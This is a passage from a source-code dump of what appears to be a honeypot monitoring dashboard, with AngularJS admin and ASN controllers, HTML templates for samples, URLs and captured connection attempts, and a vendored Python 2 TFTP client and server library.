$scope.connection = null; $scope.lines = []; $scope.formatDate = formatDateTime; $scope.nicenull = nicenull; $scope.short = short; $scope.encurl = encurl; $scope.decurl = decurl; $scope.COUNTRY_LIST = COUNTRY_LIST; $scope.REGISTRIES = { "arin": "American Registry for Internet Numbers", "ripencc": "RIPE Network Coordination Centre", "lacnic": "Latin America and Caribbean Network Information Centre", "afrinic": "African Network Information Centre", "apnic": "Asia-Pacific Network Information Centre" }; $scope.fakenames = fakenames; var asn = $routeParams.asn; $scope.filter = { "asn_id" : asn}; $http.get(api + "/asn/" + asn).then(function (httpResult) { $scope.asn = httpResult.data; $scope.asn.countryname = COUNTRY_LIST[$scope.asn.country]; $scope.connections = $scope.asn.connections.sort(function(x, y) {return y.date - x.date} ).slice(0,8); $scope.urls = $scope.asn.urls.sort(function(x, y) {return y.date - x.date} ).slice(0,8); }); }); app.controller('admin', function($scope, $http, $routeParams, $location) { $scope.loggedin = false; $scope.errormsg = null; $scope.username = null; $scope.password = null; $scope.new_username = null; $scope.new_password = null; $scope.login = function() { var auth = btoa($scope.username + ":" + $scope.password); $http.defaults.headers.common['Authorization'] = 'Basic ' + auth; $http.get(api + "/login").then(function (httpResult) { $scope.errormsg = "Logged in as " + $scope.username; $scope.loggedin = true; }, function (httpError) { $scope.errormsg = "Bad credentials"; }); $scope.password = null; }; $scope.logout = function() { delete $http.defaults.headers.common['Authorization']; $scope.errormsg = null; $scope.loggedin = false; $scope.username = null; $scope.password = null; }; $scope.addUser = function() { var newuser = { "username": $scope.new_username, "password": $scope.new_password }; $http.put(api + "/user/" + newuser.username, newuser).then(function (httpResult) { $scope.errormsg = "Created new user " + $scope.new_username; $scope.new_username = null; $scope.new_password = null; }, function (httpError) { $scope.errormsg = "Error creating new user \"" + $scope.new_username + "\" :("; $scope.new_username = null; $scope.new_password = null; }); }; }); ================================================ FILE: html/samples.html ================================================

Samples

Name Size (Bytes) First Seen
{{ sample.name }} {{ sample.length }} {{ formatDate(sample.date) }}
================================================ FILE: html/tag.html ================================================

Tag Info

Name{{ tag.name }}
Code{{ tag.code }}
N° Hits{{ tag.connections.length }}

Connections

================================================ FILE: html/tags.html ================================================

Tags

Name Code N⁰ Hits
{{ tag.name }} {{ tag.code }} {{ tag.connections }}
================================================ FILE: html/url.html ================================================

URL Info

URL{{ url.url }}
First seen{{ formatDate(url.date) }}
Resolves to {{ url.countryname }}
{{ url.ip }}
AS{{ url.asn.asn }} {{ url.asn.name }}

Sample

First seen{{ formatDate(url.sample.date) }}
First seen file name{{ url.sample.name }}
File size{{ url.sample.length }} Bytes
SHA256{{ url.sample.sha256 }}
Virustotal result{{ nicenull(url.sample.result, "Not Scanned yet") }}

Connections included this URL

Date IP Username Password
{{ formatDate(connection.date) }} {{ connection.ip }} {{ connection.user }} {{ connection.pass }}
================================================ FILE: html/urls.html ================================================

Urls

Country Url Date
{{ url.countryname }} {{ url.url }} {{ formatDate(url.date) }}
================================================ FILE: requirements.txt ================================================ setuptools werkzeug flask flask-httpauth flask-socketio sqlalchemy requests decorator dnspython ipaddress simpleeval pyyaml argon2 eventlet ================================================ FILE: tftpy/TftpClient.py ================================================ """This module implements the TFTP Client functionality. Instantiate an instance of the client, and then use its upload or download method. Logging is performed via a standard logging object set in TftpShared.""" import types from TftpShared import * from TftpPacketTypes import * from TftpContexts import TftpContextClientDownload, TftpContextClientUpload class TftpClient(TftpSession): """This class is an implementation of a tftp client. Once instantiated, a download can be initiated via the download() method, or an upload via the upload() method.""" def __init__(self, host, port, options={}): TftpSession.__init__(self) self.context = None self.host = host self.iport = port self.filename = None self.options = options if self.options.has_key('blksize'): size = self.options['blksize'] tftpassert(types.IntType == type(size), "blksize must be an int") if size < MIN_BLKSIZE or size > MAX_BLKSIZE: raise TftpException, "Invalid blksize: %d" % size def download(self, filename, output, packethook=None, timeout=SOCK_TIMEOUT): """This method initiates a tftp download from the configured remote host, requesting the filename passed. It saves the file to a local file specified in the output parameter. If a packethook is provided, it must be a function that takes a single parameter, which will be a copy of each DAT packet received in the form of a TftpPacketDAT object. The timeout parameter may be used to override the default SOCK_TIMEOUT setting, which is the amount of time that the client will wait for a receive packet to arrive. Note: If output is a hyphen then stdout is used.""" # We're downloading. log.debug("Creating download context with the following params:") log.debug("host = %s, port = %s, filename = %s, output = %s" % (self.host, self.iport, filename, output)) log.debug("options = %s, packethook = %s, timeout = %s" % (self.options, packethook, timeout)) self.context = TftpContextClientDownload(self.host, self.iport, filename, output, self.options, packethook, timeout) self.context.start() # Download happens here self.context.end() metrics = self.context.metrics log.info('') log.info("Download complete.") if metrics.duration == 0: log.info("Duration too short, rate undetermined") else: log.info("Downloaded %.2f bytes in %.2f seconds" % (metrics.bytes, metrics.duration)) log.info("Average rate: %.2f kbps" % metrics.kbps) log.info("%.2f bytes in resent data" % metrics.resent_bytes) log.info("Received %d duplicate packets" % metrics.dupcount) def upload(self, filename, input, packethook=None, timeout=SOCK_TIMEOUT): """This method initiates a tftp upload to the configured remote host, uploading the filename passed. If a packethook is provided, it must be a function that takes a single parameter, which will be a copy of each DAT packet sent in the form of a TftpPacketDAT object. The timeout parameter may be used to override the default SOCK_TIMEOUT setting, which is the amount of time that the client will wait for a DAT packet to be ACKd by the server. The input option is the full path to the file to upload, which can optionally be '-' to read from stdin. Note: If output is a hyphen then stdout is used.""" self.context = TftpContextClientUpload(self.host, self.iport, filename, input, self.options, packethook, timeout) self.context.start() # Upload happens here self.context.end() metrics = self.context.metrics log.info('') log.info("Upload complete.") if metrics.duration == 0: log.info("Duration too short, rate undetermined") else: log.info("Uploaded %d bytes in %.2f seconds" % (metrics.bytes, metrics.duration)) log.info("Average rate: %.2f kbps" % metrics.kbps) log.info("%.2f bytes in resent data" % metrics.resent_bytes) log.info("Resent %d packets" % metrics.dupcount) ================================================ FILE: tftpy/TftpContexts.py ================================================ """This module implements all contexts for state handling during uploads and downloads, the main interface to which being the TftpContext base class. The concept is simple. Each context object represents a single upload or download, and the state object in the context object represents the current state of that transfer. The state object has a handle() method that expects the next packet in the transfer, and returns a state object until the transfer is complete, at which point it returns None. That is, unless there is a fatal error, in which case a TftpException is returned instead.""" from TftpShared import * from TftpPacketTypes import * from TftpPacketFactory import TftpPacketFactory from TftpStates import * import socket, time, sys ############################################################################### # Utility classes ############################################################################### class TftpMetrics(object): """A class representing metrics of the transfer.""" def __init__(self): # Bytes transferred self.bytes = 0 # Bytes re-sent self.resent_bytes = 0 # Duplicate packets received self.dups = {} self.dupcount = 0 # Times self.start_time = 0 self.end_time = 0 self.duration = 0 # Rates self.bps = 0 self.kbps = 0 # Generic errors self.errors = 0 def compute(self): # Compute transfer time self.duration = self.end_time - self.start_time if self.duration == 0: self.duration = 1 log.debug("TftpMetrics.compute: duration is %s" % self.duration) self.bps = (self.bytes * 8.0) / self.duration self.kbps = self.bps / 1024.0 log.debug("TftpMetrics.compute: kbps is %s" % self.kbps) for key in self.dups: self.dupcount += self.dups[key] def add_dup(self, pkt): """This method adds a dup for a packet to the metrics.""" log.debug("Recording a dup of %s" % pkt) s = str(pkt) if self.dups.has_key(s): self.dups[s] += 1 else: self.dups[s] = 1 tftpassert(self.dups[s] < MAX_DUPS, "Max duplicates reached") ############################################################################### # Context classes ############################################################################### class TftpContext(object): """The base class of the contexts.""" def __init__(self, host, port, timeout, dyn_file_func=None): """Constructor for the base context, setting shared instance variables.""" self.file_to_transfer = None self.fileobj = None self.options = None self.packethook = None self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) self.sock.settimeout(timeout) self.timeout = timeout self.state = None self.next_block = 0 self.factory = TftpPacketFactory() # Note, setting the host will also set self.address, as it's a property. self.host = host self.port = port # The port associated with the TID self.tidport = None # Metrics self.metrics = TftpMetrics() # Fluag when the transfer is pending completion. self.pending_complete = False # Time when this context last received any traffic. # FIXME: does this belong in metrics? self.last_update = 0 # The last packet we sent, if applicable, to make resending easy. self.last_pkt = None self.dyn_file_func = dyn_file_func # Count the number of retry attempts. self.retry_count = 0 def getBlocksize(self): """Fetch the current blocksize for this session.""" return int(self.options.get('blksize', 512)) def __del__(self): """Simple destructor to try to call housekeeping in the end method if not called explicitely. Leaking file descriptors is not a good thing.""" self.end() def checkTimeout(self, now): """Compare current time with last_update time, and raise an exception if we're over the timeout time.""" log.debug("checking for timeout on session %s" % self) if now - self.last_update > self.timeout: raise TftpTimeout, "Timeout waiting for traffic" def start(self): raise NotImplementedError, "Abstract method" def end(self): """Perform session cleanup, since the end method should always be called explicitely by the calling code, this works better than the destructor.""" log.debug("in TftpContext.end") if self.fileobj is not None and not self.fileobj.closed: log.debug("self.fileobj is open - closing") self.fileobj.close() def gethost(self): "Simple getter method for use in a property." return self.__host def sethost(self, host): """Setter method that also sets the address property as a result of the host that is set.""" self.__host = host self.address = socket.gethostbyname(host) host = property(gethost, sethost) def setNextBlock(self, block): if block >= 2 ** 16: log.debug("Block number rollover to 0 again") block = 0 self.__eblock = block def getNextBlock(self): return self.__eblock next_block = property(getNextBlock, setNextBlock) def cycle(self): """Here we wait for a response from the server after sending it something, and dispatch appropriate action to that response.""" try: (buffer, (raddress, rport)) = self.sock.recvfrom(MAX_BLKSIZE) except socket.timeout: log.warn("Timeout waiting for traffic, retrying...") raise TftpTimeout, "Timed-out waiting for traffic" # Ok, we've received a packet. Log it. log.debug("Received %d bytes from %s:%s" % (len(buffer), raddress, rport)) # And update our last updated time. self.last_update = time.time() # Decode it. recvpkt = self.factory.parse(buffer) # Check for known "connection". if raddress != self.address: log.warn("Received traffic from %s, expected host %s. Discarding" % (raddress, self.host)) if self.tidport and self.tidport != rport: log.warn("Received traffic from %s:%s but we're " "connected to %s:%s. Discarding." % (raddress, rport, self.host, self.tidport)) # If there is a packethook defined, call it. We unconditionally # pass all packets, it's up to the client to screen out different # kinds of packets. This way, the client is privy to things like # negotiated options. if self.packethook: self.packethook(recvpkt) # And handle it, possibly changing state. self.state = self.state.handle(recvpkt, raddress, rport) # If we didn't throw any exceptions here, reset the retry_count to # zero. self.retry_count = 0 class TftpContextServer(TftpContext): """The context for the server.""" def __init__(self, host, port, timeout, root, dyn_file_func=None): TftpContext.__init__(self, host, port, timeout, dyn_file_func ) # At this point we have no idea if this is a download or an upload. We # need to let the start state determine that. self.state = TftpStateServerStart(self) self.root = root self.dyn_file_func = dyn_file_func def __str__(self): return "%s:%s %s" % (self.host, self.port, self.state) def start(self, buffer): """Start the state cycle. Note that the server context receives an initial packet in its start method. Also note that the server does not loop on cycle(), as it expects the TftpServer object to manage that.""" log.debug("In TftpContextServer.start") self.metrics.start_time = time.time() log.debug("Set metrics.start_time to %s" % self.metrics.start_time) # And update our last updated time. self.last_update = time.time() pkt = self.factory.parse(buffer) log.debug("TftpContextServer.start() - factory returned a %s" % pkt) # Call handle once with the initial packet. This should put us into # the download or the upload state. self.state = self.state.handle(pkt, self.host, self.port) def end(self): """Finish up the context.""" TftpContext.end(self) self.metrics.end_time = time.time() log.debug("Set metrics.end_time to %s" % self.metrics.end_time) self.metrics.compute() class TftpContextClientUpload(TftpContext): """The upload context for the client during an upload. Note: If input is a hyphen, then we will use stdin.""" def __init__(self, host, port, filename, input, options, packethook, timeout): TftpContext.__init__(self, host, port, timeout) self.file_to_transfer = filename self.options = options self.packethook = packethook if input == '-': self.fileobj = sys.stdin else: self.fileobj = open(input, "rb") log.debug("TftpContextClientUpload.__init__()") log.debug("file_to_transfer = %s, options = %s" % (self.file_to_transfer, self.options)) def __str__(self): return "%s:%s %s" % (self.host, self.port, self.state) def start(self): log.info("Sending tftp upload request to %s" % self.host) log.info(" filename -> %s" % self.file_to_transfer) log.info(" options -> %s" % self.options) self.metrics.start_time = time.time() log.debug("Set metrics.start_time to %s" % self.metrics.start_time) # FIXME: put this in a sendWRQ method? pkt = TftpPacketWRQ() pkt.filename = self.file_to_transfer pkt.mode = "octet" # FIXME - shouldn't hardcode this pkt.options = self.options self.sock.sendto(pkt.encode().buffer, (self.host, self.port)) self.next_block = 1 self.last_pkt = pkt # FIXME: should we centralize sendto operations so we can refactor all # saving of the packet to the last_pkt field? self.state = TftpStateSentWRQ(self) while self.state: try: log.debug("State is %s" % self.state) self.cycle() except TftpTimeout, err: log.error(str(err)) self.retry_count += 1 if self.retry_count >= TIMEOUT_RETRIES: log.debug("hit max retries, giving up") raise else: log.warn("resending last packet") self.state.resendLast() def end(self): """Finish up the context.""" TftpContext.end(self) self.metrics.end_time = time.time() log.debug("Set metrics.end_time to %s" % self.metrics.end_time) self.metrics.compute() class TftpContextClientDownload(TftpContext): """The download context for the client during a download. Note: If output is a hyphen, then the output will be sent to stdout.""" def __init__(self, host, port, filename, output, options, packethook, timeout): TftpContext.__init__(self, host, port, timeout) # FIXME: should we refactor setting of these params? self.file_to_transfer = filename self.options = options self.packethook = packethook # FIXME - need to support alternate return formats than files? # File-like objects would be ideal, ala duck-typing. # If the filename is -, then use stdout if output == '-': self.fileobj = sys.stdout elif type(output) == str: self.fileobj = open(output, "wb") else: self.fileobj = output log.debug("TftpContextClientDownload.__init__()") log.debug("file_to_transfer = %s, options = %s" % (self.file_to_transfer, self.options)) def __str__(self): return "%s:%s %s" % (self.host, self.port, self.state) def start(self): """Initiate the download.""" log.info("Sending tftp download request to %s" % self.host) log.info(" filename -> %s" % self.file_to_transfer) log.info(" options -> %s" % self.options) self.metrics.start_time = time.time() log.debug("Set metrics.start_time to %s" % self.metrics.start_time) # FIXME: put this in a sendRRQ method? pkt = TftpPacketRRQ() pkt.filename = self.file_to_transfer pkt.mode = "octet" # FIXME - shouldn't hardcode this pkt.options = self.options self.sock.sendto(pkt.encode().buffer, (self.host, self.port)) self.next_block = 1 self.last_pkt = pkt self.state = TftpStateSentRRQ(self) while self.state: try: log.debug("State is %s" % self.state) self.cycle() except TftpTimeout, err: log.error(str(err)) self.retry_count += 1 if self.retry_count >= TIMEOUT_RETRIES: log.debug("hit max retries, giving up") raise else: log.warn("resending last packet") self.state.resendLast() def end(self): """Finish up the context.""" TftpContext.end(self) self.metrics.end_time = time.time() log.debug("Set metrics.end_time to %s" % self.metrics.end_time) self.metrics.compute() ================================================ FILE: tftpy/TftpPacketFactory.py ================================================ """This module implements the TftpPacketFactory class, which can take a binary buffer, and return the appropriate TftpPacket object to represent it, via the parse() method.""" from TftpShared import * from TftpPacketTypes import * class TftpPacketFactory(object): """This class generates TftpPacket objects. It is responsible for parsing raw buffers off of the wire and returning objects representing them, via the parse() method.""" def __init__(self): self.classes = { 1: TftpPacketRRQ, 2: TftpPacketWRQ, 3: TftpPacketDAT, 4: TftpPacketACK, 5: TftpPacketERR, 6: TftpPacketOACK } def parse(self, buffer): """This method is used to parse an existing datagram into its corresponding TftpPacket object. The buffer is the raw bytes off of the network.""" log.debug("parsing a %d byte packet" % len(buffer)) (opcode,) = struct.unpack("!H", buffer[:2]) log.debug("opcode is %d" % opcode) packet = self.__create(opcode) packet.buffer = buffer return packet.decode() def __create(self, opcode): """This method returns the appropriate class object corresponding to the passed opcode.""" tftpassert(self.classes.has_key(opcode), "Unsupported opcode: %d" % opcode) packet = self.classes[opcode]() return packet ================================================ FILE: tftpy/TftpPacketTypes.py ================================================ """This module implements the packet types of TFTP itself, and the corresponding encode and decode methods for them.""" import struct from TftpShared import * class TftpSession(object): """This class is the base class for the tftp client and server. Any shared code should be in this class.""" # FIXME: do we need this anymore? pass class TftpPacketWithOptions(object): """This class exists to permit some TftpPacket subclasses to share code regarding options handling. It does not inherit from TftpPacket, as the goal is just to share code here, and not cause diamond inheritance.""" def __init__(self): self.options = {} def setoptions(self, options): log.debug("in TftpPacketWithOptions.setoptions") log.debug("options: " + str(options)) myoptions = {} for key in options: newkey = str(key) myoptions[newkey] = str(options[key]) log.debug("populated myoptions with %s = %s" % (newkey, myoptions[newkey])) log.debug("setting options hash to: " + str(myoptions)) self._options = myoptions def getoptions(self): log.debug("in TftpPacketWithOptions.getoptions") return self._options # Set up getter and setter on options to ensure that they are the proper # type. They should always be strings, but we don't need to force the # client to necessarily enter strings if we can avoid it. options = property(getoptions, setoptions) def decode_options(self, buffer): """This method decodes the section of the buffer that contains an unknown number of options. It returns a dictionary of option names and values.""" format = "!" options = {} log.debug("decode_options: buffer is: " + repr(buffer)) log.debug("size of buffer is %d bytes" % len(buffer)) if len(buffer) == 0: log.debug("size of buffer is zero, returning empty hash") return {} # Count the nulls in the buffer. Each one terminates a string. log.debug("about to iterate options buffer counting nulls") length = 0 for c in buffer: #log.debug("iterating this byte: " + repr(c)) if ord(c) == 0: log.debug("found a null at length %d" % length) if length > 0: format += "%dsx" % length length = -1 else: raise TftpException, "Invalid options in buffer" length += 1 log.debug("about to unpack, format is: %s" % format) mystruct = struct.unpack(format, buffer) tftpassert(len(mystruct) % 2 == 0, "packet with odd number of option/value pairs") for i in range(0, len(mystruct), 2): log.debug("setting option %s to %s" % (mystruct[i], mystruct[i+1])) options[mystruct[i]] = mystruct[i+1] return options class TftpPacket(object): """This class is the parent class of all tftp packet classes. It is an abstract class, providing an interface, and should not be instantiated directly.""" def __init__(self): self.opcode = 0 self.buffer = None def encode(self): """The encode method of a TftpPacket takes keyword arguments specific to the type of packet, and packs an appropriate buffer in network-byte order suitable for sending over the wire. This is an abstract method.""" raise NotImplementedError, "Abstract method" def decode(self): """The decode method of a TftpPacket takes a buffer off of the wire in network-byte order, and decodes it, populating internal properties as appropriate. This can only be done once the first 2-byte opcode has already been decoded, but the data section does include the entire datagram. This is an abstract method.""" raise NotImplementedError, "Abstract method" class TftpPacketInitial(TftpPacket, TftpPacketWithOptions): """This class is a common parent class for the RRQ and WRQ packets, as they share quite a bit of code.""" def __init__(self): TftpPacket.__init__(self) TftpPacketWithOptions.__init__(self) self.filename = None self.mode = None def encode(self): """Encode the packet's buffer from the instance variables.""" tftpassert(self.filename, "filename required in initial packet") tftpassert(self.mode, "mode required in initial packet") ptype = None if self.opcode == 1: ptype = "RRQ" else: ptype = "WRQ" log.debug("Encoding %s packet, filename = %s, mode = %s" % (ptype, self.filename, self.mode)) for key in self.options: log.debug(" Option %s = %s" % (key, self.options[key])) format = "!H" format += "%dsx" % len(self.filename) if self.mode == "octet": format += "5sx" else: raise AssertionError, "Unsupported mode: %s" % mode # Add options. options_list = [] if self.options.keys() > 0: log.debug("there are options to encode") for key in self.options: # Populate the option name format += "%dsx" % len(key) options_list.append(key) # Populate the option value format += "%dsx" % len(str(self.options[key])) options_list.append(str(self.options[key])) log.debug("format is %s" % format) log.debug("options_list is %s" % options_list) log.debug("size of struct is %d" % struct.calcsize(format)) self.buffer = struct.pack(format, self.opcode, self.filename, self.mode, *options_list) log.debug("buffer is " + repr(self.buffer)) return self def decode(self): tftpassert(self.buffer, "Can't decode, buffer is empty") # FIXME - this shares a lot of code with decode_options nulls = 0 format = "" nulls = length = tlength = 0 log.debug("in decode: about to iterate buffer counting nulls") subbuf = self.buffer[2:] for c in subbuf: log.debug("iterating this byte: " + repr(c)) if ord(c) == 0: nulls += 1 log.debug("found a null at length %d, now have %d" % (length, nulls)) format += "%dsx" % length length = -1 # At 2 nulls, we want to mark that position for decoding. if nulls == 2: break length += 1 tlength += 1 log.debug("hopefully found end of mode at length %d" % tlength) # length should now be the end of the mode. tftpassert(nulls == 2, "malformed packet") shortbuf = subbuf[:tlength+1] log.debug("about to unpack buffer with format: %s" % format) log.debug("unpacking buffer: " + repr(shortbuf)) mystruct = struct.unpack(format, shortbuf) tftpassert(len(mystruct) == 2, "malformed packet") self.filename = mystruct[0] self.mode = mystruct[1].lower() # force lc - bug 17 log.debug("set filename to %s" % self.filename) log.debug("set mode to %s" % self.mode) self.options = self.decode_options(subbuf[tlength+1:]) return self class TftpPacketRRQ(TftpPacketInitial): """ :: 2 bytes string 1 byte string 1 byte ----------------------------------------------- RRQ/ | 01/02 | Filename | 0 | Mode | 0 | WRQ ----------------------------------------------- """ def __init__(self): TftpPacketInitial.__init__(self) self.opcode = 1 def __str__(self): s = 'RRQ packet: filename = %s' % self.filename s += ' mode = %s' % self.mode if self.options: s += '\n options = %s' % self.options return s class TftpPacketWRQ(TftpPacketInitial): """ :: 2 bytes string 1 byte string 1 byte ----------------------------------------------- RRQ/ | 01/02 | Filename | 0 | Mode | 0 | WRQ ----------------------------------------------- """ def __init__(self): TftpPacketInitial.__init__(self) self.opcode = 2 def __str__(self): s = 'WRQ packet: filename = %s' % self.filename s += ' mode = %s' % self.mode if self.options: s += '\n options = %s' % self.options return s class TftpPacketDAT(TftpPacket): """ :: 2 bytes 2 bytes n bytes --------------------------------- DATA | 03 | Block # | Data | --------------------------------- """ def __init__(self): TftpPacket.__init__(self) self.opcode = 3 self.blocknumber = 0 self.data = None def __str__(self): s = 'DAT packet: block %s' % self.blocknumber if self.data: s += '\n data: %d bytes' % len(self.data) return s def encode(self): """Encode the DAT packet. This method populates self.buffer, and returns self for easy method chaining.""" if len(self.data) == 0: log.debug("Encoding an empty DAT packet") format = "!HH%ds" % len(self.data) self.buffer = struct.pack(format, self.opcode, self.blocknumber, self.data) return self def decode(self): """Decode self.buffer into instance variables. It returns self for easy method chaining.""" # We know the first 2 bytes are the opcode. The second two are the # block number. (self.blocknumber,) = struct.unpack("!H", self.buffer[2:4]) log.debug("decoding DAT packet, block number %d" % self.blocknumber) log.debug("should be %d bytes in the packet total" % len(self.buffer)) # Everything else is data. self.data = self.buffer[4:] log.debug("found %d bytes of data" % len(self.data)) return self class TftpPacketACK(TftpPacket): """ :: 2 bytes 2 bytes ------------------- ACK | 04 | Block # | -------------------- """ def __init__(self): TftpPacket.__init__(self) self.opcode = 4 self.blocknumber = 0 def __str__(self): return 'ACK packet: block %d' % self.blocknumber def encode(self): log.debug("encoding ACK: opcode = %d, block = %d" % (self.opcode, self.blocknumber)) self.buffer = struct.pack("!HH", self.opcode, self.blocknumber) return self def decode(self): self.opcode, self.blocknumber = struct.unpack("!HH", self.buffer) log.debug("decoded ACK packet: opcode = %d, block = %d" % (self.opcode, self.blocknumber)) return self class TftpPacketERR(TftpPacket): """ :: 2 bytes 2 bytes string 1 byte ---------------------------------------- ERROR | 05 | ErrorCode | ErrMsg | 0 | ---------------------------------------- Error Codes Value Meaning 0 Not defined, see error message (if any). 1 File not found. 2 Access violation. 3 Disk full or allocation exceeded. 4 Illegal TFTP operation. 5 Unknown transfer ID. 6 File already exists. 7 No such user. 8 Failed to negotiate options """ def __init__(self): TftpPacket.__init__(self) self.opcode = 5 self.errorcode = 0 # FIXME: We don't encode the errmsg... self.errmsg = None # FIXME - integrate in TftpErrors references? self.errmsgs = { 1: "File not found", 2: "Access violation", 3: "Disk full or allocation exceeded", 4: "Illegal TFTP operation", 5: "Unknown transfer ID", 6: "File already exists", 7: "No such user", 8: "Failed to negotiate options" } def __str__(self): s = 'ERR packet: errorcode = %d' % self.errorcode s += '\n msg = %s' % self.errmsgs.get(self.errorcode, '') return s def encode(self): """Encode the DAT packet based on instance variables, populating self.buffer, returning self.""" format = "!HH%dsx" % len(self.errmsgs[self.errorcode]) log.debug("encoding ERR packet with format %s" % format) self.buffer = struct.pack(format, self.opcode, self.errorcode, self.errmsgs[self.errorcode]) return self def decode(self): "Decode self.buffer, populating instance variables and return self." buflen = len(self.buffer) tftpassert(buflen >= 4, "malformed ERR packet, too short") log.debug("Decoding ERR packet, length %s bytes" % buflen) if buflen == 4: log.debug("Allowing this affront to the RFC of a 4-byte packet") format = "!HH" log.debug("Decoding ERR packet with format: %s" % format) self.opcode, self.errorcode = struct.unpack(format, self.buffer) else: log.debug("Good ERR packet > 4 bytes") format = "!HH%dsx" % (len(self.buffer) - 5) log.debug("Decoding ERR packet with format: %s" % format) self.opcode, self.errorcode, self.errmsg = struct.unpack(format, self.buffer) log.error("ERR packet - errorcode: %d, message: %s" % (self.errorcode, self.errmsg)) return self class TftpPacketOACK(TftpPacket, TftpPacketWithOptions): """ :: +-------+---~~---+---+---~~---+---+---~~---+---+---~~---+---+ | opc | opt1 | 0 | value1 | 0 | optN | 0 | valueN | 0 | +-------+---~~---+---+---~~---+---+---~~---+---+---~~---+---+ """ def __init__(self): TftpPacket.__init__(self) TftpPacketWithOptions.__init__(self) self.opcode = 6 def __str__(self): return 'OACK packet:\n options = %s' % self.options def encode(self): format = "!H" # opcode options_list = [] log.debug("in TftpPacketOACK.encode") for key in self.options: log.debug("looping on option key %s" % key) log.debug("value is %s" % self.options[key]) format += "%dsx" % len(key) format += "%dsx" % len(self.options[key]) options_list.append(key) options_list.append(self.options[key]) self.buffer = struct.pack(format, self.opcode, *options_list) return self def decode(self): self.options = self.decode_options(self.buffer[2:]) return self def match_options(self, options): """This method takes a set of options, and tries to match them with its own. It can accept some changes in those options from the server as part of a negotiation. Changed or unchanged, it will return a dict of the options so that the session can update itself to the negotiated options.""" for name in self.options: if options.has_key(name): if name == 'blksize': # We can accept anything between the min and max values. size = self.options[name] if size >= MIN_BLKSIZE and size <= MAX_BLKSIZE: log.debug("negotiated blksize of %d bytes" % size) options[blksize] = size else: raise TftpException, "Unsupported option: %s" % name return True ================================================ FILE: tftpy/TftpServer.py ================================================ """This module implements the TFTP Server functionality. Instantiate an instance of the server, and then run the listen() method to listen for client requests. Logging is performed via a standard logging object set in TftpShared.""" import socket, os, time import select from TftpShared import * from TftpPacketTypes import * from TftpPacketFactory import TftpPacketFactory from TftpContexts import TftpContextServer class TftpServer(TftpSession): """This class implements a tftp server object. Run the listen() method to listen for client requests. It takes two optional arguments. tftproot is the path to the tftproot directory to serve files from and/or write them to. dyn_file_func is a callable that must return a file-like object to read from during downloads. This permits the serving of dynamic content.""" def __init__(self, tftproot='/tftpboot', dyn_file_func=None): self.listenip = None self.listenport = None self.sock = None # FIXME: What about multiple roots? self.root = os.path.abspath(tftproot) self.dyn_file_func = dyn_file_func # A dict of sessions, where each session is keyed by a string like # ip:tid for the remote end. self.sessions = {} if os.path.exists(self.root): log.debug("tftproot %s does exist" % self.root) if not os.path.isdir(self.root): raise TftpException, "The tftproot must be a directory." else: log.debug("tftproot %s is a directory" % self.root) if os.access(self.root, os.R_OK): log.debug("tftproot %s is readable" % self.root) else: raise TftpException, "The tftproot must be readable" if os.access(self.root, os.W_OK): log.debug("tftproot %s is writable" % self.root) else: log.warning("The tftproot %s is not writable" % self.root) else: raise TftpException, "The tftproot does not exist." def listen(self, listenip="", listenport=DEF_TFTP_PORT, timeout=SOCK_TIMEOUT): """Start a server listening on the supplied interface and port. This defaults to INADDR_ANY (all interfaces) and UDP port 69. You can also supply a different socket timeout value, if desired.""" tftp_factory = TftpPacketFactory() # Don't use new 2.5 ternary operator yet # listenip = listenip if listenip else '0.0.0.0' if not listenip: listenip = '0.0.0.0' log.info("Server requested on ip %s, port %s" % (listenip, listenport)) try: # FIXME - sockets should be non-blocking self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) self.sock.bind((listenip, listenport)) except socket.error, err: # Reraise it for now. raise log.info("Starting receive loop...") while True: # Build the inputlist array of sockets to select() on. inputlist = [] inputlist.append(self.sock) for key in self.sessions: inputlist.append(self.sessions[key].sock) # Block until some socket has input on it. log.debug("Performing select on this inputlist: %s" % inputlist) readyinput, readyoutput, readyspecial = select.select(inputlist, [], [], SOCK_TIMEOUT) deletion_list = [] # Handle the available data, if any. Maybe we timed-out. for readysock in readyinput: # Is the traffic on the main server socket? ie. new session? if readysock == self.sock: log.debug("Data ready on our main socket") buffer, (raddress, rport) = self.sock.recvfrom(MAX_BLKSIZE) log.debug("Read %d bytes" % len(buffer)) # Forge a session key based on the client's IP and port, # which should safely work through NAT. key = "%s:%s" % (raddress, rport) if not self.sessions.has_key(key): log.debug("Creating new server context for " "session key = %s" % key) self.sessions[key] = TftpContextServer(raddress, rport, timeout, self.root, self.dyn_file_func) try: self.sessions[key].start(buffer) except TftpException, err: deletion_list.append(key) log.error("Fatal exception thrown from " "session %s: %s" % (key, str(err))) else: log.warn("received traffic on main socket for " "existing session??") log.info("Currently handling these sessions:") for session_key, session in self.sessions.items(): log.info(" %s" % session) else: # Must find the owner of this traffic. for key in self.sessions: if readysock == self.sessions[key].sock: log.info("Matched input to session key %s" % key) try: self.sessions[key].cycle() if self.sessions[key].state == None: log.info("Successful transfer.") deletion_list.append(key) except TftpException, err: deletion_list.append(key) log.error("Fatal exception thrown from " "session %s: %s" % (key, str(err))) # Break out of for loop since we found the correct # session. break else: log.error("Can't find the owner for this packet. " "Discarding.") log.debug("Looping on all sessions to check for timeouts") now = time.time() for key in self.sessions: try: self.sessions[key].checkTimeout(now) except TftpTimeout, err: log.error(str(err)) self.sessions[key].retry_count += 1 if self.sessions[key].retry_count >= TIMEOUT_RETRIES: log.debug("hit max retries on %s, giving up" % self.sessions[key]) deletion_list.append(key) else: log.debug("resending on session %s" % self.sessions[key]) self.sessions[key].state.resendLast() log.debug("Iterating deletion list.") for key in deletion_list: log.info('') log.info("Session %s complete" % key) if self.sessions.has_key(key): log.debug("Gathering up metrics from session before deleting") self.sessions[key].end() metrics = self.sessions[key].metrics if metrics.duration == 0: log.info("Duration too short, rate undetermined") else: log.info("Transferred %d bytes in %.2f seconds" % (metrics.bytes, metrics.duration)) log.info("Average rate: %.2f kbps" % metrics.kbps) log.info("%.2f bytes in resent data" % metrics.resent_bytes) log.info("%d duplicate packets" % metrics.dupcount) log.debug("Deleting session %s" % key) del self.sessions[key] log.debug("Session list is now %s" % self.sessions) else: log.warn("Strange, session %s is not on the deletion list" % key) ================================================ FILE: tftpy/TftpShared.py ================================================ """This module holds all objects shared by all other modules in tftpy.""" import logging LOG_LEVEL = logging.NOTSET MIN_BLKSIZE = 8 DEF_BLKSIZE = 512 MAX_BLKSIZE = 65536 SOCK_TIMEOUT = 5 MAX_DUPS = 20 TIMEOUT_RETRIES = 5 DEF_TFTP_PORT = 69 # A 